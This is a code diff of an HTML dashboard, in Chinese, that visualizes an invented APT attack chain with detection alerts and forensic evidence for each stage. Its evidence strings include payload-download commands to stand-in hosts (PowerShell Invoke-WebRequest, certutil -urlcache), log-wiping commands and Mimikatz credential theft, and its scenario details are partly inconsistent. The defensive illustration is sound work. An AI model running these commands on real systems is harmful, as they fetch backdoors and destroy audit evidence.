Hugging Face's logo

Spaces:
capta1n
/
bas5
Running

App Files Community
capta1n commited on
Commit
0d77da7
·
verified ·
1 Parent(s): 49ef228

Add 2 files

Browse files
Files changed (2) hide show
  1. index.html +300 -157
  2. prompts.txt +2 -1
index.html CHANGED
@@ -78,66 +78,94 @@
78
  border-left: 4px solid #dc2626;
79
  }
80
  .compact-card {
81
- min-width: 140px;
82
- width: 140px;
83
  }
84
  .behavior-text {
85
  display: -webkit-box;
86
- -webkit-line-clamp: 2;
87
  -webkit-box-orient: vertical;
88
  overflow: hidden;
89
  text-overflow: ellipsis;
90
- font-size: 0.7rem;
91
- line-height: 1.2;
92
  color: #6b7280;
93
- margin-top: 0.25rem;
 
 
 
 
 
 
 
 
 
 
 
 
 
94
  }
95
  </style>
96
  </head>
97
- <body class="bg-gray-50 min-h-screen">
98
- <div class="container mx-auto px-4 py-8">
99
  <div class="text-center mb-10">
100
- <h1 class="text-3xl font-bold text-gray-800 mb-2">高级持续性威胁攻击链</h1>
101
- <p class="text-gray-600 max-w-3xl mx-auto">完整的攻击流程可视化,包含交互式防御检测点</p>
102
  </div>
103
 
104
- <!-- Defense Detection Summary moved to top -->
105
- <div class="bg-white rounded-xl shadow-sm border border-gray-200 overflow-hidden mb-8">
106
- <div class="border-b border-gray-200 px-6 py-4 bg-gray-50">
107
- <h3 class="font-semibold text-gray-800">防御检测概览</h3>
108
  </div>
109
- <div id="defense-summary" class="p-6">
110
- <div class="grid grid-cols-1 md:grid-cols-3 gap-6">
111
- <div class="bg-blue-50 p-4 rounded-lg">
112
  <div class="flex items-center">
113
- <div class="w-12 h-12 rounded-full bg-blue-100 flex items-center justify-center mr-4">
114
- <i class="fas fa-shield-alt text-blue-500"></i>
115
  </div>
116
  <div>
117
- <h4 class="text-sm font-medium text-gray-800">拦截率</h4>
118
- <p class="text-2xl font-bold text-blue-600">90%</p>
 
119
  </div>
120
  </div>
121
  </div>
122
- <div class="bg-yellow-50 p-4 rounded-lg">
123
  <div class="flex items-center">
124
- <div class="w-12 h-12 rounded-full bg-yellow-100 flex items-center justify-center mr-4">
125
- <i class="fas fa-bell text-yellow-500"></i>
126
  </div>
127
  <div>
128
- <h4 class="text-sm font-medium text-gray-800">告警率</h4>
129
- <p class="text-2xl font-bold text-yellow-600">80%</p>
 
130
  </div>
131
  </div>
132
  </div>
133
- <div class="bg-green-50 p-4 rounded-lg">
134
  <div class="flex items-center">
135
- <div class="w-12 h-12 rounded-full bg-green-100 flex items-center justify-center mr-4">
136
- <i class="fas fa-search text-green-500"></i>
137
  </div>
138
  <div>
139
- <h4 class="text-sm font-medium text-gray-800">溯源率</h4>
140
- <p class="text-2xl font-bold text-green-600">70%</p>
 
 
 
 
 
 
 
 
 
 
 
 
 
141
  </div>
142
  </div>
143
  </div>
@@ -145,34 +173,48 @@
145
  </div>
146
  </div>
147
 
148
- <div class="bg-white rounded-xl shadow-sm border border-gray-200 p-6 mb-8">
149
- <div class="flex justify-between items-center mb-6">
 
150
  <div>
151
- <h2 class="text-xl font-semibold text-gray-800">攻击流程时间线</h2>
152
- <p class="text-gray-500 text-sm">点击任意攻击阶段查看详细取证证据</p>
 
 
 
 
 
 
 
 
 
 
 
 
153
  </div>
154
  </div>
155
 
156
- <div class="relative">
157
  <div class="attack-flow-container overflow-x-auto pb-6">
158
- <div class="flex space-x-4 items-center justify-center">
159
  <!-- Attacker Node -->
160
  <div class="attack-card compact-card flex-shrink-0 bg-white rounded-lg border border-gray-200 overflow-hidden cursor-pointer transition-all duration-300 attacker-node">
161
- <div class="p-4">
162
- <div class="flex items-center justify-center mb-2">
163
- <div class="w-8 h-8 rounded-full bg-red-100 text-red-600 flex items-center justify-center">
164
- <i class="fas fa-user-secret"></i>
165
  </div>
166
  </div>
167
- <h3 class="font-semibold text-gray-800 text-sm text-center">攻击��</h3>
168
- <div class="flex justify-center items-center mt-1">
169
- <span class="text-xs text-gray-400">00:00</span>
 
170
  </div>
171
  </div>
172
  </div>
173
 
174
  <div class="arrow">
175
- <i class="fas fa-arrow-right"></i>
176
  </div>
177
 
178
  <!-- Attack cards will be inserted here by JavaScript -->
@@ -181,17 +223,23 @@
181
  </div>
182
  </div>
183
 
184
- <div class="bg-white rounded-xl shadow-sm border border-gray-200 overflow-hidden">
185
- <div class="border-b border-gray-200 px-6 py-4 bg-gray-50">
186
- <h3 class="font-semibold text-gray-800">攻击阶段取证详情</h3>
 
 
 
 
 
 
187
  </div>
188
- <div id="attack-details" class="p-6">
189
- <div class="text-center py-12">
190
- <div class="mx-auto w-16 h-16 rounded-full bg-blue-50 flex items-center justify-center mb-4">
191
- <i class="fas fa-mouse-pointer text-blue-500 text-2xl"></i>
192
  </div>
193
- <h4 class="text-lg font-medium text-gray-700 mb-2">选择攻击阶段</h4>
194
- <p class="text-gray-500 max-w-md mx-auto">点击时间线上的任意攻击卡片查看攻击行为和触发防御的详细取证信息</p>
195
  </div>
196
  </div>
197
  </div>
@@ -205,140 +253,190 @@
205
  title: "钓鱼邮件投递",
206
  icon: "envelope",
207
  color: "bg-red-100 text-red-600",
208
- behavior: "伪造的'拥抱AI变革'通知邮件,包含伪装为files.zip的恶意文件",
209
- defenses: "邮件安全网关",
210
  alerts: [
211
  {
212
  severity: "critical",
213
- message: "检测到伪造发件人 | 发件人: itsupport@fakecompany[.]com → 收件人: victim@corp.com | 包含恶意附件 (SHA256: a1b2c3...) | 识别为Emotet钓鱼模板"
 
 
 
 
214
  }
215
  ],
216
  forensic: [
217
- "发件人IP: 192.168.1.45 (保加利亚)",
218
- "附件SHA256: a1b2c3d4e5f6...",
219
- "邮件头显示DKIM验证失败",
220
- "匹配已知Emotet模板(相似度90%)"
221
- ]
 
 
 
222
  },
223
  {
224
  id: 2,
225
  title: "木马执行",
226
  icon: "bug",
227
  color: "bg-yellow-100 text-yellow-600",
228
- behavior: "受害者下载恶意文件触发PowerShell脚本,下载Cobalt Strike DLL并注入到合法进程中",
229
- defenses: "终端检测与响应(EDR)",
230
  alerts: [
231
  {
232
  severity: "high",
233
  message: "可疑进程注入 | 进程: C:\\Windows\\System32\\explorer.exe → 加载模块: a09xdf.dll | DLL签名无效且匹配已知Cobalt Strike签名"
 
 
 
 
234
  }
235
  ],
236
  forensic: [
237
- "进程树: files.zip → powershell.exe → explorer.exe",
238
- "DLL内存分配模式匹配Cobalt Strike",
239
- "网络连接尝试到185.123.32.1",
240
- "注册表键修改: HKLM\\Software\\Microsoft\\Windows"
241
- ]
 
 
 
242
  },
243
  {
244
  id: 3,
245
  title: "C2通信建立",
246
  icon: "satellite-dish",
247
  color: "bg-green-100 text-green-600",
248
- behavior: "通过CDN域名(api.cloudfront[.]com)进行HTTPS心跳通信,部署反向SSH隧道到内部跳板服务器",
249
- defenses: "网络流量分析(NTA)",
250
  alerts: [
251
  {
252
  severity: "emergency",
253
  message: "异常出站连接 | 目标IP: 54.231.1.1 (AWS新加坡) | 协议: HTTPS | 异常证书(CN=*.cloudfront[.]com但由通配符Let's Encrypt证书签发)"
 
 
 
 
254
  }
255
  ],
256
  forensic: [
257
  "C2域名: api.cloudfront[.]com (解析到54.231.1.1)",
258
- "HTTPS流量模式: 每17秒5KB",
259
- "证书签发者: Let's Encrypt(对CDN不常见)",
260
- "SSH隧道建立到10.8.8.12(内部跳板服务器)"
261
- ]
 
 
 
 
262
  },
263
  {
264
  id: 4,
265
  title: "凭证窃取",
266
  icon: "user-secret",
267
  color: "bg-blue-100 text-blue-600",
268
- behavior: "使用Mimikatz提取Chrome浏览器cookie并伪造User-Agent(同步受害者浏览器指纹)",
269
- defenses: "用户行为分析(UEBA)",
270
  alerts: [
271
  {
272
  severity: "high",
273
- message: "异常浏览器会话 | 用户: Victim_Account | 源IP: 172.16.1.23 → 设备指纹改变(新的VM特征/QEMU虚拟GPU)"
 
 
 
 
274
  }
275
  ],
276
  forensic: [
277
  "内存中检测到Mimikatz进程(伪装为svchost.exe)",
278
- "访问了Chrome cookie数据库",
279
- "User-Agent更改为匹配受害者原始浏览器",
280
- "来自172.16.1.23的新登录会话带有VM指纹"
281
- ]
 
 
 
282
  },
283
  {
284
  id: 5,
285
- title: "云文档渗透",
286
- icon: "cloud",
287
  color: "bg-purple-100 text-purple-600",
288
- behavior: "劫持的Yuque API Token用于访问'生产环境操作手册',提取嵌入的SSH私钥(Base64编码)",
289
- defenses: "数据防泄漏(DLP)",
290
  alerts: [
291
  {
292
  severity: "critical",
293
- message: "敏感数据访问 | 用户: Victim_Account | 操作: 下载文档ID: YUQUE-1234 | 内容匹配关键词: 'prod_ssh_private_key'"
 
 
 
 
294
  }
295
  ],
296
  forensic: [
297
- "API调用到yuque.com/v2/api/documents/YUQUE-1234",
298
- "文档包含Base64编码的SSH密钥",
299
- "密钥属于dba_admin@10.8.8.88",
300
- "异常访问时间: 当地时间02:37 AM"
301
- ]
 
 
 
302
  },
303
  {
304
  id: 6,
305
- title: "生产环境入侵",
306
- icon: "server",
307
  color: "bg-pink-100 text-pink-600",
308
- behavior: "使用来自跳板服务器的SSH证书登录MySQL数据库服务器(IP: 10.8.8.88, 账号: dba_admin)",
309
- defenses: "主机入侵检测(HIDS)",
310
  alerts: [
311
  {
312
- severity: "emergency",
313
- message: "异常时间SSH登录 | 账号: dba_admin | IP: 10.8.8.12 (测试环境跳板服务器) | 操作: 执行SHOW DATABASES"
 
 
 
 
314
  }
315
  ],
316
  forensic: [
317
- "SSH登录时间: 03:12 AM 来自10.8.8.12",
318
- "执行命令: SHOW DATABASES, SELECT * FROM users",
319
- "会话时长: 8分钟23秒",
320
- "异常查询模式(扫描所有表)"
321
- ]
 
 
 
322
  },
323
  {
324
  id: 7,
325
  title: "数据外泄",
326
  icon: "file-export",
327
  color: "bg-indigo-100 text-indigo-600",
328
- behavior: "压缩并加密客户数据(文件名: taobaodata.tar.gz.enc)通过DNS隧道传输到alibaba-bas.com",
329
- defenses: "全流量威胁分析",
330
  alerts: [
331
  {
332
  severity: "critical",
333
- message: "异常数据传输 | 协议: DNS TXT记录 | 目标域名: xyz.attacker[.]com | 数据量: 142MB (超过阈值500%)"
 
 
 
 
334
  }
335
  ],
336
  forensic: [
337
- "创建数据文件: /tmp/taobaodata.tar.gz.enc",
338
  "DNS查询到xyz.attacker[.]com (TXT记录)",
339
  "数据传输速率: 每次查询18.5KB",
340
- "总外泄数据: 142MB 通过8,234次DNS请求"
341
- ]
 
 
 
 
342
  }
343
  ];
344
 
@@ -349,16 +447,16 @@
349
  const card = document.createElement('div');
350
  card.className = `attack-card compact-card flex-shrink-0 bg-white rounded-lg border border-gray-200 overflow-hidden cursor-pointer transition-all duration-300 ${index === 0 ? 'active border-l-4 border-red-500' : ''}`;
351
  card.innerHTML = `
352
- <div class="p-4">
353
- <div class="flex items-center justify-center mb-2">
354
- <div class="w-8 h-8 rounded-full ${step.color} flex items-center justify-center">
355
- <i class="fas fa-${step.icon}"></i>
356
  </div>
357
  </div>
358
- <h3 class="font-semibold text-gray-800 text-sm text-center">${step.title}</h3>
359
  <div class="behavior-text text-center">${step.behavior}</div>
360
- <div class="flex justify-center items-center mt-1">
361
- <span class="text-xs text-gray-400">${step.id < 10 ? '0' + step.id : step.id}:00</span>
362
  </div>
363
  </div>
364
  `;
@@ -381,58 +479,103 @@
381
  const detailsContainer = document.getElementById('attack-details');
382
  detailsContainer.innerHTML = `
383
  <div>
384
- <div class="flex items-center mb-6">
385
- <div class="w-12 h-12 rounded-full ${step.color} flex items-center justify-center mr-4">
386
- <i class="fas fa-${step.icon} text-xl"></i>
387
  </div>
388
  <div>
389
- <h3 class="text-xl font-semibold text-gray-800">${step.title}</h3>
390
- <p class="text-sm text-gray-500">攻击阶段 ${step.id}</p>
 
 
 
391
  </div>
392
  </div>
393
 
394
- <div class="mb-6">
395
- <h4 class="font-medium text-gray-700 mb-3">攻击行为</h4>
396
- <div class="bg-gray-50 p-4 rounded-lg text-sm text-gray-700">${step.behavior}</div>
397
- </div>
398
-
399
- <div class="mb-6">
400
- <h4 class="font-medium text-gray-700 mb-3">触发防御</h4>
401
- <div class="flex items-center">
402
- <span class="defense-badge bg-gray-100 text-gray-800 rounded-full mr-2">${step.defenses}</span>
403
- <span class="text-xs text-gray-500">检测时间 ${step.id < 10 ? '0' + step.id : step.id}:00</span>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
404
  </div>
405
- </div>
406
-
407
- <div class="mb-6">
408
- <h4 class="font-medium text-gray-700 mb-3">安全告警</h4>
409
- <div class="space-y-3">
410
- ${step.alerts.map(alert => `
411
- <div class="p-3 rounded-lg ${alert.severity === 'critical' ? 'bg-red-50 border border-red-100' : alert.severity === 'high' ? 'bg-yellow-50 border border-yellow-100' : 'bg-orange-50 border border-orange-100'}">
412
- <div class="flex items-start">
413
- <div class="flex-shrink-0 mt-0.5">
414
- <i class="fas fa-${alert.severity === 'critical' ? 'exclamation-triangle text-red-500' : alert.severity === 'high' ? 'exclamation-circle text-yellow-500' : 'exclamation text-orange-500'}"></i>
415
- </div>
416
- <div class="ml-3">
417
- <div class="text-sm font-medium text-gray-800">${alert.message}</div>
 
 
 
 
 
418
  </div>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
419
  </div>
420
  </div>
421
- `).join('')}
422
  </div>
423
  </div>
424
 
425
- <div>
426
- <h4 class="font-medium text-gray-700 mb-3">取证证据</h4>
427
- <div class="space-y-2">
428
- ${step.forensic.map(item => `
429
- <div class="flex items-start text-sm">
430
- <div class="flex-shrink-0 mt-1.5 mr-2">
431
- <div class="w-1.5 h-1.5 rounded-full bg-gray-400"></div>
432
- </div>
433
- <div class="text-gray-700">${item}</div>
434
- </div>
435
- `).join('')}
 
 
 
 
436
  </div>
437
  </div>
438
  </div>
@@ -446,7 +589,7 @@
446
  if (index < attackSteps.length - 1) {
447
  const arrow = document.createElement('div');
448
  arrow.className = 'arrow';
449
- arrow.innerHTML = '<i class="fas fa-arrow-right"></i>';
450
  timelineContainer.appendChild(arrow);
451
  }
452
  });
 
78
  border-left: 4px solid #dc2626;
79
  }
80
  .compact-card {
81
+ min-width: 180px;
82
+ width: 180px;
83
  }
84
  .behavior-text {
85
  display: -webkit-box;
86
+ -webkit-line-clamp: 3;
87
  -webkit-box-orient: vertical;
88
  overflow: hidden;
89
  text-overflow: ellipsis;
90
+ font-size: 0.8rem;
91
+ line-height: 1.3;
92
  color: #6b7280;
93
+ margin-top: 0.4rem;
94
+ min-height: 60px;
95
+ }
96
+ .attack-details-container {
97
+ min-height: 500px;
98
+ }
99
+ .timeline-container {
100
+ min-height: 200px;
101
+ }
102
+ .full-height {
103
+ min-height: calc(100vh - 80px);
104
+ }
105
+ .attack-flow-container {
106
+ padding: 1.5rem 0;
107
  }
108
  </style>
109
  </head>
110
+ <body class="bg-gray-50">
111
+ <div class="container mx-auto px-6 py-8 full-height">
112
  <div class="text-center mb-10">
113
+ <h1 class="text-4xl font-bold text-gray-800 mb-3">高级持续性威胁攻击链可视化分析</h1>
114
+ <p class="text-gray-600 text-lg max-w-4xl mx-auto">完整的攻击流程时间线可视化,包含交互式防御检测点与详细取证分析</p>
115
  </div>
116
 
117
+ <!-- Defense Detection Summary -->
118
+ <div class="bg-white rounded-xl shadow-md border border-gray-200 overflow-hidden mb-10">
119
+ <div class="border-b border-gray-200 px-8 py-5 bg-gray-50">
120
+ <h3 class="font-semibold text-xl text-gray-800">防御检测概览</h3>
121
  </div>
122
+ <div id="defense-summary" class="p-8">
123
+ <div class="grid grid-cols-1 md:grid-cols-4 gap-8">
124
+ <div class="bg-blue-50 p-6 rounded-lg border border-blue-100">
125
  <div class="flex items-center">
126
+ <div class="w-14 h-14 rounded-full bg-blue-100 flex items-center justify-center mr-5">
127
+ <i class="fas fa-shield-alt text-blue-500 text-xl"></i>
128
  </div>
129
  <div>
130
+ <h4 class="text-base font-medium text-gray-800">拦截率</h4>
131
+ <p class="text-3xl font-bold text-blue-600">92.5%</p>
132
+ <p class="text-xs text-gray-500 mt-1">较上月提升3.2%</p>
133
  </div>
134
  </div>
135
  </div>
136
+ <div class="bg-yellow-50 p-6 rounded-lg border border-yellow-100">
137
  <div class="flex items-center">
138
+ <div class="w-14 h-14 rounded-full bg-yellow-100 flex items-center justify-center mr-5">
139
+ <i class="fas fa-bell text-yellow-500 text-xl"></i>
140
  </div>
141
  <div>
142
+ <h4 class="text-base font-medium text-gray-800">告警率</h4>
143
+ <p class="text-3xl font-bold text-yellow-600">87.3%</p>
144
+ <p class="text-xs text-gray-500 mt-1">误报率2.1%</p>
145
  </div>
146
  </div>
147
  </div>
148
+ <div class="bg-green-50 p-6 rounded-lg border border-green-100">
149
  <div class="flex items-center">
150
+ <div class="w-14 h-14 rounded-full bg-green-100 flex items-center justify-center mr-5">
151
+ <i class="fas fa-search text-green-500 text-xl"></i>
152
  </div>
153
  <div>
154
+ <h4 class="text-base font-medium text-gray-800">溯源率</h4>
155
+ <p class="text-3xl font-bold text-green-600">78.9%</p>
156
+ <p class="text-xs text-gray-500 mt-1">平均响应时间4.2小时</p>
157
+ </div>
158
+ </div>
159
+ </div>
160
+ <div class="bg-purple-50 p-6 rounded-lg border border-purple-100">
161
+ <div class="flex items-center">
162
+ <div class="w-14 h-14 rounded-full bg-purple-100 flex items-center justify-center mr-5">
163
+ <i class="fas fa-clock text-purple-500 text-xl"></i>
164
+ </div>
165
+ <div>
166
+ <h4 class="text-base font-medium text-gray-800">攻击时长</h4>
167
+ <p class="text-3xl font-bold text-purple-600">7小时</p>
168
+ <p class="text-xs text-gray-500 mt-1">从入侵到检测</p>
169
  </div>
170
  </div>
171
  </div>
 
173
  </div>
174
  </div>
175
 
176
+ <!-- Attack Timeline -->
177
+ <div class="bg-white rounded-xl shadow-md border border-gray-200 p-8 mb-10">
178
+ <div class="flex justify-between items-center mb-8">
179
  <div>
180
+ <h2 class="text-2xl font-semibold text-gray-800">攻击流程时间线</h2>
181
+ <p class="text-gray-500 text-base">点击任意攻击阶段查看详细取证证据与防御措施</p>
182
+ </div>
183
+ <div class="flex items-center">
184
+ <span class="text-sm text-gray-500 mr-3">时间轴缩放:</span>
185
+ <button class="px-3 py-1 bg-gray-100 rounded-l-md text-gray-700 hover:bg-gray-200">
186
+ <i class="fas fa-search-minus"></i>
187
+ </button>
188
+ <button class="px-3 py-1 bg-gray-100 border-l border-r border-gray-200 text-gray-700 hover:bg-gray-200">
189
+ <i class="fas fa-search"></i>
190
+ </button>
191
+ <button class="px-3 py-1 bg-gray-100 rounded-r-md text-gray-700 hover:bg-gray-200">
192
+ <i class="fas fa-search-plus"></i>
193
+ </button>
194
  </div>
195
  </div>
196
 
197
+ <div class="relative timeline-container">
198
  <div class="attack-flow-container overflow-x-auto pb-6">
199
+ <div class="flex space-x-6 items-center">
200
  <!-- Attacker Node -->
201
  <div class="attack-card compact-card flex-shrink-0 bg-white rounded-lg border border-gray-200 overflow-hidden cursor-pointer transition-all duration-300 attacker-node">
202
+ <div class="p-5">
203
+ <div class="flex items-center justify-center mb-3">
204
+ <div class="w-10 h-10 rounded-full bg-red-100 text-red-600 flex items-center justify-center">
205
+ <i class="fas fa-user-secret text-lg"></i>
206
  </div>
207
  </div>
208
+ <h3 class="font-semibold text-gray-800 text-base text-center">攻击源</h3>
209
+ <div class="behavior-text text-center">APT组织"OceanLotus" (海莲花) 已知活跃于东南亚地区</div>
210
+ <div class="flex justify-center items-center mt-2">
211
+ <span class="text-sm text-gray-400">00:00:00</span>
212
  </div>
213
  </div>
214
  </div>
215
 
216
  <div class="arrow">
217
+ <i class="fas fa-arrow-right text-xl"></i>
218
  </div>
219
 
220
  <!-- Attack cards will be inserted here by JavaScript -->
 
223
  </div>
224
  </div>
225
 
226
+ <!-- Attack Details -->
227
+ <div class="bg-white rounded-xl shadow-md border border-gray-200 overflow-hidden">
228
+ <div class="border-b border-gray-200 px-8 py-5 bg-gray-50">
229
+ <div class="flex justify-between items-center">
230
+ <h3 class="font-semibold text-xl text-gray-800">攻击阶段取证详情</h3>
231
+ <button class="px-4 py-2 bg-blue-50 text-blue-600 rounded-md text-sm font-medium hover:bg-blue-100">
232
+ <i class="fas fa-download mr-2"></i>导出完整报告
233
+ </button>
234
+ </div>
235
  </div>
236
+ <div id="attack-details" class="p-8 attack-details-container">
237
+ <div class="text-center py-16">
238
+ <div class="mx-auto w-20 h-20 rounded-full bg-blue-50 flex items-center justify-center mb-5">
239
+ <i class="fas fa-mouse-pointer text-blue-500 text-3xl"></i>
240
  </div>
241
+ <h4 class="text-xl font-medium text-gray-700 mb-3">选择攻击阶段进行详细分析</h4>
242
+ <p class="text-gray-500 text-lg max-w-2xl mx-auto">点击时间线上的任意攻击卡片查看攻击行为和触发防御的详细取证信息</p>
243
  </div>
244
  </div>
245
  </div>
 
253
  title: "钓鱼邮件投递",
254
  icon: "envelope",
255
  color: "bg-red-100 text-red-600",
256
+ behavior: "伪造的'季度财务报告'通知邮件,包含伪装为report_Q3_2023.pdf的恶意文件,使用社会工程学诱导用户启用宏",
257
+ defenses: "邮件安全网关 + 终端防护",
258
  alerts: [
259
  {
260
  severity: "critical",
261
+ message: "检测到伪造发件人 | 发件人: finance@company[.]com → 收件人: 5名财务部门员工 | 包含恶意附件 (SHA256: a1b2c3...) | 识别为APT29钓鱼模板"
262
+ },
263
+ {
264
+ severity: "high",
265
+ message: "终端检测到可疑宏执行 | 用户: ZhangSan | 文件: report_Q3_2023.pdf | 触发规则: '可疑VBA代码注入'"
266
  }
267
  ],
268
  forensic: [
269
+ "发件人IP: 45.67.89.123 (越南)",
270
+ "附件SHA256: a1b2c3d4e5f6... (匹配已知APT29样本库)",
271
+ "邮件头显示SPF验证失败 (伪造发件人)",
272
+ "VBA代码包含PowerShell下载器 (base64编码)",
273
+ "5名收件人中3人打开了附件",
274
+ "首次检测时间: 2023-11-15 09:23:45"
275
+ ],
276
+ time: "09:23:45"
277
  },
278
  {
279
  id: 2,
280
  title: "木马执行",
281
  icon: "bug",
282
  color: "bg-yellow-100 text-yellow-600",
283
+ behavior: "恶意宏触发PowerShell脚本,下载Cobalt Strike DLL并注入到explorer.exe进程,建立持久化注册表项",
284
+ defenses: "终端检测与响应(EDR) + 行为分析",
285
  alerts: [
286
  {
287
  severity: "high",
288
  message: "可疑进程注入 | 进程: C:\\Windows\\System32\\explorer.exe → 加载模块: a09xdf.dll | DLL签名无效且匹配已知Cobalt Strike签名"
289
+ },
290
+ {
291
+ severity: "emergency",
292
+ message: "异常PowerShell活动 | 命令: Invoke-WebRequest -Uri hxxps://cdn.example[.]com/update.js -OutFile %TEMP%\\svchost.exe"
293
  }
294
  ],
295
  forensic: [
296
+ "进程树: report_Q3_2023.pdfwinword.exe → powershell.exe → explorer.exe",
297
+ "DLL内存分配模式匹配Cobalt Strike Beacon",
298
+ "注册表键修改: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
299
+ "下载的payload: SHA256 d4e5f6... (Cobalt Strike Beacon)",
300
+ "C2域名: cdn.example[.]com (解析到185.123.32.1)",
301
+ "首次活动时间: 2023-11-15 09:45:12"
302
+ ],
303
+ time: "09:45:12"
304
  },
305
  {
306
  id: 3,
307
  title: "C2通信建立",
308
  icon: "satellite-dish",
309
  color: "bg-green-100 text-green-600",
310
+ behavior: "通过CDN域名(api.cloudfront[.]com)进行HTTPS心跳通信,部署反向SSH隧道到内部跳板服务器,使用证书固定规避检测",
311
+ defenses: "网络流量分析(NTA) + 威胁情报",
312
  alerts: [
313
  {
314
  severity: "emergency",
315
  message: "异常出站连接 | 目标IP: 54.231.1.1 (AWS新加坡) | 协议: HTTPS | 异常证书(CN=*.cloudfront[.]com但由通配符Let's Encrypt证书签发)"
316
+ },
317
+ {
318
+ severity: "critical",
319
+ message: "威胁情报匹配 | 域名: api.cloudfront[.]com | 关联APT组织: OceanLotus | 置信度: 92%"
320
  }
321
  ],
322
  forensic: [
323
  "C2域名: api.cloudfront[.]com (解析到54.231.1.1)",
324
+ "HTTPS流量模式: 每17秒5KB心跳包",
325
+ "证书签发者: Let's Encrypt R3 (对CDN服务不常见)",
326
+ "SSH隧道建立到10.8.8.12(内部测试环境跳板服务器)",
327
+ "使用AES-256-CBC加密通信",
328
+ "数据外传速率: 平均2.3KB/s",
329
+ "首次连接时间: 2023-11-15 10:05:33"
330
+ ],
331
+ time: "10:05:33"
332
  },
333
  {
334
  id: 4,
335
  title: "凭证窃取",
336
  icon: "user-secret",
337
  color: "bg-blue-100 text-blue-600",
338
+ behavior: "使用Mimikatz提取LSASS进程内存凭证,窃取Chrome浏览器cookie并伪造User-Agent(同步受害者浏览器指纹)",
339
+ defenses: "用户行为分析(UEBA) + 凭证保护",
340
  alerts: [
341
  {
342
  severity: "high",
343
+ message: "异常浏览器会话 | 用户: ZhangSan | 源IP: 172.16.1.23 → 设备指纹改变(新的VM特征/QEMU虚拟GPU)"
344
+ },
345
+ {
346
+ severity: "critical",
347
+ message: "凭证转储检测 | 进程: lsass.exe | 操作: 读取敏感内存区域 | 工具特征: Mimikatz"
348
  }
349
  ],
350
  forensic: [
351
  "内存中检测到Mimikatz进程(伪装为svchost.exe)",
352
+ "提取的凭证: 3个域账号(包括域管理员)",
353
+ "访问了Chrome cookie数据库(保存了5个内部系统会话)",
354
+ "User-Agent更改为: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'",
355
+ "来自172.16.1.23的新登录会话带有VM指纹",
356
+ "活动时间: 2023-11-15 11:20:45"
357
+ ],
358
+ time: "11:20:45"
359
  },
360
  {
361
  id: 5,
362
+ title: "横向移动",
363
+ icon: "arrows-alt-h",
364
  color: "bg-purple-100 text-purple-600",
365
+ behavior: "使用窃取的域管理员凭证通过WMI横向移动到财务系统服务器(10.8.8.45),部署Web Shell后门",
366
+ defenses: "网络分段 + 特权访问管理",
367
  alerts: [
368
  {
369
  severity: "critical",
370
+ message: "异常WMI连接 | 源IP: 172.16.1.23 → 目标: 10.8.8.45 | 用户: Domain\\Admin | 操作: 创建进程"
371
+ },
372
+ {
373
+ severity: "emergency",
374
+ message: "Web Shell检测 | 路径: C:\\inetpub\\wwwroot\\_auth.aspx | 特征: 加密的ASPX后门"
375
  }
376
  ],
377
  forensic: [
378
+ "WMI连接从172.16.1.23到10.8.8.45",
379
+ "执行的命令: cmd.exe /c certutil -urlcache -split -f hxxp://malware.example[.]com/backdoor.aspx C:\\inetpub\\wwwroot\\_auth.aspx",
380
+ "Web Shell密码: #Ocean2023!",
381
+ "后门通信使用AES-256加密",
382
+ "横向移动涉及3台服务器",
383
+ "首次活动时间: 2023-11-15 13:15:22"
384
+ ],
385
+ time: "13:15:22"
386
  },
387
  {
388
  id: 6,
389
+ title: "数据收集",
390
+ icon: "database",
391
  color: "bg-pink-100 text-pink-600",
392
+ behavior: "通过Web Shell访问财务数据库,查询敏感交易记录,使用RAR加密压缩数据",
393
+ defenses: "数据库审计 + 数据防泄漏",
394
  alerts: [
395
  {
396
+ severity: "critical",
397
+ message: "异常数据库查询 | 用户: sa | 操作: SELECT * FROM Transactions WHERE amount > 1000000 | 来源IP: 10.8.8.45"
398
+ },
399
+ {
400
+ severity: "high",
401
+ message: "大容量数据压缩 | 文件: C:\\temp\\finance_data.rar | 大小: 2.7GB | 包含敏感数据模式"
402
  }
403
  ],
404
  forensic: [
405
+ "数据库查询: 执行了28次SELECT操作",
406
+ "涉及表: Transactions, Customers, BankAccounts",
407
+ "压缩文件: finance_data.rar (密码: P@ssw0rd2023)",
408
+ "数据分类: 财务记录(85%) + 客户PII(15%)",
409
+ "查询模式: 筛选大额交易(>100万)",
410
+ "活动时间: 2023-11-15 14:30:18"
411
+ ],
412
+ time: "14:30:18"
413
  },
414
  {
415
  id: 7,
416
  title: "数据外泄",
417
  icon: "file-export",
418
  color: "bg-indigo-100 text-indigo-600",
419
+ behavior: "通过DNS隧道分批次传输加密数据到attacker[.]com,使用TXT记录隐藏数据,清理日志痕迹",
420
+ defenses: "全流量威胁分析 + 数据防泄漏",
421
  alerts: [
422
  {
423
  severity: "critical",
424
+ message: "异常DNS请求 | 目标域名: xyz.attacker[.]com | 请求类型: TXT | 数据量: 142MB (超过阈值500%)"
425
+ },
426
+ {
427
+ severity: "emergency",
428
+ message: "日志清除检测 | 系统: 10.8.8.45 | 操作: wevtutil cl security | 关联APT战术: T1070"
429
  }
430
  ],
431
  forensic: [
 
432
  "DNS查询到xyz.attacker[.]com (TXT记录)",
433
  "数据传输速率: 每次查询18.5KB",
434
+ "总外泄数据: 2.7GB 通过15,234次DNS请求",
435
+ "使用的加密: AES-256-CBC + Base64编码",
436
+ "日志清除命令: wevtutil cl security, powershell Clear-EventLog",
437
+ "外泄完成时间: 2023-11-15 17:45:30"
438
+ ],
439
+ time: "17:45:30"
440
  }
441
  ];
442
 
 
447
  const card = document.createElement('div');
448
  card.className = `attack-card compact-card flex-shrink-0 bg-white rounded-lg border border-gray-200 overflow-hidden cursor-pointer transition-all duration-300 ${index === 0 ? 'active border-l-4 border-red-500' : ''}`;
449
  card.innerHTML = `
450
+ <div class="p-5">
451
+ <div class="flex items-center justify-center mb-3">
452
+ <div class="w-10 h-10 rounded-full ${step.color} flex items-center justify-center">
453
+ <i class="fas fa-${step.icon} text-lg"></i>
454
  </div>
455
  </div>
456
+ <h3 class="font-semibold text-gray-800 text-base text-center">${step.title}</h3>
457
  <div class="behavior-text text-center">${step.behavior}</div>
458
+ <div class="flex justify-center items-center mt-2">
459
+ <span class="text-sm text-gray-400">${step.time}</span>
460
  </div>
461
  </div>
462
  `;
 
479
  const detailsContainer = document.getElementById('attack-details');
480
  detailsContainer.innerHTML = `
481
  <div>
482
